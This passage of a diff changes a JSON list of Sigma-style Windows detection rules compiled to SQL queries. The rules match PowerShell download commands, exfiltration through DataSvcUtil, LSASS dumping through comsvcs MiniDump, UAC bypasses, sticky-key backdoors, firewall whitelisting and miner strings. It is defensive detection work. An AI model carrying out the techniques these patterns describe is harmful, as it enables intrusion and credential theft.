"SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%rasdial.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_rasdial_execution.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", - "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WMI Persistence - Script Event Consumer", + "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "status": "test", + "description": "Detects WMI script event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" }, { - "title": "CL_LoadAssembly.ps1 Proxy Execution", - "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", - "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", - "author": "frack113", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", - "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "title": "Suspicious Execution of InstallUtil Without Log", + "id": "d042284c-a296-4988-9be5-f424fadcc28c", "status": "test", - "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", - "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", + "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "author": "frack113", "tags": [ - "attack.t1218", "attack.defense_evasion" ], "falsepositives": [ - "The process spawned by vsjitdebugger.exe is uncommon." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND NewProcessName LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" + "filename": "proc_creation_win_instalutil_no_log_execution.yml" }, { - "title": "Active Directory Structure Export Via Csvde.EXE", - "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", + "title": "HackTool - SharpLDAPmonitor Execution", + "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "status": "experimental", - "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_csvde_export.yml" + "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" }, { - "title": "DirLister Execution", - "id": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "title": "Greedy File Deletion Using Del", + "id": "204b17ae-4007-471b-917b-b917b315c5db", "status": "experimental", - "description": "Detect the usage of \"DirLister.exe\" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.", + "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate use by users" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'DirLister.exe' OR NewProcessName LIKE '%\\\\dirlister.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dirlister_execution.yml" + "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "title": "PowerShell Download Pattern", + "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a Powershell process that contains download commands in its command line string", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_powershell_download_patterns.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" - ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" - }, - { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", - "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.execution", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", + "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1562.004" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ - "Legitimate WinRM usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "status": "test", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1496" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND 